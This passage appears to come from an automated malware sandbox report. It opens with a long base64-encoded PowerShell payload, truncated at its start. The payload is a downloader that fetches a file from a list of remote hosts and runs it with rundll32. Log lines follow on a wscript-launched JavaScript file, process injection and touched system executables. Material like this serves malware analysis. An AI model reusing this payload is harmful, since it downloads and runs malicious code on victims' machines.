AG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABVAHIAYgBpAGMAbwBsAGEAZQBHAGUAbgBlAHQAaABsAGkAYQBjAGkAcwBtACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQASABlAGwAbABlAGIAbwByAGkAbgBlAEgAYQBpAHIAcwB0AHIAZQBhAGsAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwATQBpAHQAaQBnAGEAdABpAG8AbgBUAHIAaQBtAG0AaQBuAGcAbAB5AC4AYwBsAGEAdQBzAGUAcwA7ACQAYgBhAHMAawBlAHQAdwBvAHIAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAMwBBAEQAWQBBAEwAZwBBAHkAQQBEAFEAQQBNAGcAQQA9ACIAOwAkAEUAcwBjAGEAbABsAG8AcABzAE8AdgBlAHIAYQBzAHMAdQBtAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABNAEEATwBBAEEAdQBBAEQASQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB6AEEARABFAEEATABnAEEAMQBBAEQASQBBAGcAdwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHADQAQQBkAEEAQgBwAEEASABNAEEAWQBRAEIAMgBBAEcARQBBAFoAdwBCAGwAQQBFAGcAQQBaAFEAQgBoAEEARwBRAEEAYwB3AEIAbwBBAEcARQBBAGEAdwBCAGwAQQBIAEkAQQBMAGcAQgBqAEEASABJAEEAWgBRAEIAawBBAEcAawBBAGQAQQBBAD0AIgA7ACQAdABoAGUAcgBzAGkAdABlAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADUAQQBDADQAQQBPAEEAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQATQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQA9AEQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwA0AEEAWgBRAEIAMQBBAEgASQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgBzAEEARwBrAEEAYgBnAEIAcgBBAEEAPQA9AEQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBRAEEAMQBBAEMANABBAE0AUQBBADMAQQBEAGcAQQBMAGcAQQB4AEEARABJAEEATQBRAEEAdQBBAEQARQBBAE4AQQBBADAAQQBBAD0APQBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAeABBAEgAVQBBAFkAUQBCAHoAQQBHAGsAQQBjAEEAQgBsAEEASABJAEEAYQBRAEIAdgBBAEcAUQBBAGEAUQBCAGoAQQBFAHcAQQBhAFEAQgAwAEEARwBVAEEAYwBnAEIAaABBAEgAUQBBAFoAUQBCAHMAQQBIAGsAQQBMAGcAQgBpAEEARwA4AEEAZABRAEIAMABBAEcAawBBAGMAUQBCADEAQQBHAFUAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABNAGkAdABpAGcAYQB0AGkAbwBuAFQAcgBpAG0AbQBpAG4AZwBsAHkALgBjAGwAYQB1AHMAZQBzACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA5ADkANwAxADIAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBFADAAQQBhAFEAQgAwAEEARwBrAEEAWgB3AEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBWAEEAQgB5AEEARwBrAEEAYgBRAEIAdABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQQB1AEEARwBNAEEAYgBBAEIAaABBAEgAVQBBAGMAdwBCAGwAQQBIAE0AQQBMAEEAQgAyAEEARwBrAEEAYwBBAEIAegBBAEQAcwBBAFQAUQBCAEoAQQBGAFEAQQBUAEEAQgBwAEEARwBNAEEAWgBRAEIAdQBBAEgATQBBAFoAUQBBAD0AIgA7ACQAYwBhAGwAbwBtAGUAbABzAEIAZQBuAHoAbwBwAHkAcgBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAGMAQQBMAGcAQQB4AEEARABNAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADUAQQBDADQAQQBPAEEAQQAzAEEAQQA9AD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBOAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADIAQQBDADQAQQBNAFEAQQB6AEEARABJAEEAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAMgBBAEMANABBAE0AUQBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEAZgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAWQBBAEwAZwBBAHgAQQBEAEkAQQBOAFEAQQB1AEEARABFAEEATQBBAEEAMQBBAEEAPQA9ACIAOwAkAHMAYQB0AHUAcgBhAHQAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBBAEEAMgBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATABnAEEAeABBAEQATQBBAE4AQQBBAD0AIgA7ACQASgBlAG8AcABhAHIAZABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAHcAQgB3AEEARwB3AEEAWgBRAEIAdQBBAEcAawBBAGIAdwBCAHAAQQBHAFEAQQBUAEEAQgBoAEEASABBAEEAYwB3AEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9AFQAZgBKAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATQBBAEEAdQBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBOAGcAQQAzAEEAQwA0AEEATQBnAEEAeABBAEQATQBBACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7ACQAbgBvAG4AZQB4AHQAZQBuAHMAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBiAHcAQgB5AEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEcAQQBIAEkAQQBkAFEAQgBuAEEARwBFAEEAYgBBAEIAcABBAEgATQBBAGQAQQBBAHUAQQBIAE0AQQBhAEEAQgB2AEEARwBVAEEAYwB3AEEAPQBMAEIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEANABBAEMANABBAE0AUQBBAHcAQQBEAFkAQQBMAGcAQQAwAEEARABRAEEATABnAEEAeQBBAEQATQBBAE4AUQBBAD0ATABCAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEcAOABBAGMAdwBCAHoAQQBHAGsAQQBaAFEAQgBUAEEASABVAEEAWQBnAEIAaQBBAEcARQBBAGMAdwBCAHoAQQBDADQAQQBhAEEAQgB2AEEARwBNAEEAYQB3AEIAbABBAEgAawBBACIAOwB9AH0AJABwAGUAcgBqAHUAcgBlAGQAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEANQBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeQBBAEQAQQBBAE4AUQBBAD0AcABjAFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATwBBAEEAdQBBAEQASQBBAE4AQQBBADUAQQBDADQAQQBNAFEAQQB4AEEARABjAEEATABnAEEAMABBAEQAQQBBAHAAYwBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCADAAQQBHAGcAQQBlAFEAQgBzAEEARwBVAEEAYgBnAEIAbABBAEYAVQBBAGIAZwBCAHcAQQBHAHcAQQBkAFEAQgBuAEEASABNAEEATABnAEIAcgBBAEcAawBBAGIAUQBBAD0AIgA7ACQAVQBuAGsAaQBsAGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABNAEEATABnAEEAeABBAEQASQBBAE0AdwBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABJAEEATQBRAEEAMQBBAEEAPQA9AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABNAEEATQBnAEEAdQBBAEQARQBBAE4AdwBBADQAQQBBAD0APQAiADsAJABIAG8AdABwAHIAZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB5AEEAQwA0AEEATgBnAEEANABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQBMAGcAQQAzAEEARABjAEEAIgA7AA=="
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" "C:\ProgramData\subclan.js" unobliginglyPostpathologic NontraceableSchmalzy EyaletHardcopy EngraffedAnglophobist
parent_process wscript.exe martian_process wscript "C:\ProgramData\subclan.js" unobliginglyPostpathologic NontraceableSchmalzy EyaletHardcopy EngraffedAnglophobist
Process injection Process 3036 resumed a thread in remote process 2404
Process injection Process 2404 resumed a thread in remote process 1140
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000340
suspend_count: 1
process_identifier: 2404
1 0 0

NtResumeThread

 thread_handle: 0x00000340
suspend_count: 1
process_identifier: 1140
1 0 0
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe